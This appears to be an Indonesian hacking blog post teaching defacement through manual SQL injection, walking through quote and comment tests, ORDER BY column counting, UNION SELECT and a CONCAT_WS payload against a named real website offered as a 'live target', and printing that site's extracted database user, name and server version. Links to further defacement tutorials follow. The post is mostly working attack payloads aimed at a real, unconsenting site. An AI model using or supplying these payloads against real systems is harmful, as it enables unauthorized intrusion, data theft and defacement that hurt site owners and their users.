Home
Deface

Deface Dengan Cara SQL Injection Manual

1 min read
hallo kawan :D

kembali lagi bersama gue admin yg ganteng :v
Setelah sekian lama tidak posting artikel, ya maaf sibuk dengan sekolah ( adminnya masih sekolah gan ), teman, pelajaran , dan yang pasti pacar wwkwk

kali ini gue akan memberikan tutorial Deface Dengan Cara SQL Injection Manual
beberapa bulan lalu gue memberikan tutorial sqli dengan pakai SQLMAP, Nah sekarang gue memberikan caranya dengan cara manual

langsung aja ya gan, sans aja live target udh gue sediakan kok :D

LIVE TARGET : http://garudatransindonesia.com/artikel.php?id=9


1. Untuk inject nya lebih mudah pakai Mozilla firefox + hackbar ya :D

2. Masukkan payload ( ' ) *tanpa tanda kurung , di akhir URL, maka website akan blank, menandakan bahwa web tersebut vuln SQL Injection
http://garudatransindonesia.com/artikel.php?id=9'



3. Selanjutnya beri tanda ( -- - ) di akhir url, contoh seperti ini
http://garudatransindonesia.com/artikel.php?id=9'-- -
Jika web kembali menampilkan artikel secara normal, berarti vuln SQLI



4. Sekarang kita memakai order+by untuk mencari error nya dimana
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+2-- - = NO ERROR/ BLANK
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+5-- - = NO ERROR/ BLANK
http://garudatransindonesia.com/artikel.php?id=9'+ORDER+BY+6-- - = ERROR / BLANK



5. Karena order by error nya di nomor 6, sekarang kita union select , untuk mencari column nya di nomor berapa beri tanda ( . ) di belakang parameter nya
Union select di nomor 5, karena order by nya error di nomor 6
http://garudatransindonesia.com/artikel.php?id=.9'+UNION+ALL+SELECT+1,2,3,4,5-- -


6. Yap udh ketemu ya nomor column nya yaitu di angka 2, sekarang kita mencari tau user, database , dan version nya, caranya? kita beri basic statement di menu hackbar kalian
Atau juga bisa memakai payload ini, taruh di letak angka 2
Payload = CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION())

 http://garudatransindonesia.com/artikel.php?id=.9'+UNION+ALL+SELECT+1,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),3,4,5-- -


7, Dan taraaaa, kita sudah mendapatkan user , database , dan version nya


User : u2232528_garudatrans@localhost
Database : u2232528_garuda
Version : 10.2.17-MariaDB

 Untuk mencari table tablenya, tinggal hapus aja payload nya, lalu memakai DIOS yang tersedia di hackbar :D

Ok sekian...
Kalau ada yang tidak mengerti kalian bisa Komentar atau chat admin di fanpage facebook kami ya :D

ordinary people

You may like these posts

  • Deface Dengan Cara Com Media
    Yaa hello guys , ketemu lg neh >:( awokawokwk... Oe mau share tutor deface Com Media naaah tutor deface ini cocok buat yg pemula mau belajar deface >:( Ok langsung ja ya …
  • Deface Dengan Cara Bypass Admin
    Haee oe muncul lg ne >:( Oh iya ane muncul mao tebar tutor yg simple neh buat yg baru belajar deface , nih ane kasih tutor DEFACE DENGAN CARA BYPASS ADMIN >:( oh iya ane mao…
  • Contoh Script Deface
    HACKED BY Mr.13u4y4l4ut Your Security Is Low !!! We Are Anonymous " We Do not forget " We do not forgive " Expect us!"" Hii admin :) "Ini pesan kami " Untuk anda "" …
  • Deface Dengan Cara Component Uploader Drag And Drop
    Hallo geng uci geng uci geng :v Oke gw mau share tutorial Deface Dengan Cara Component Uploader Drag And Drop Langsung aja ya gan DORK : intext:Drag&Drop files here [ …
  • Deface Dengan Cara OJS
    Haii Selamat siang hehe , Ketemu lg bersama saya Si ganteng and tamvans akwokaowkaowk Oh iya ane mau share tutor Deface OJS ne cooy :v Ok langsung aja ya cara and bahan bahannya :…
  • Deface Dengan Cara Register Member
    Hoaaam ane ngantuk gan :( ,,, tapi ane keinget ada 1 tutor lagi yg masih banyak yg vulnerability , ya jadi apa salahnya ane tulis disini berbagi ilmu itu indah, jadi jangan merasa…

2 comments

  1. second ago
    Itu kan ada user,database,dan version. Kalo ngga ada database ga bisa ya min?
  2. second ago
    galaucrew.tech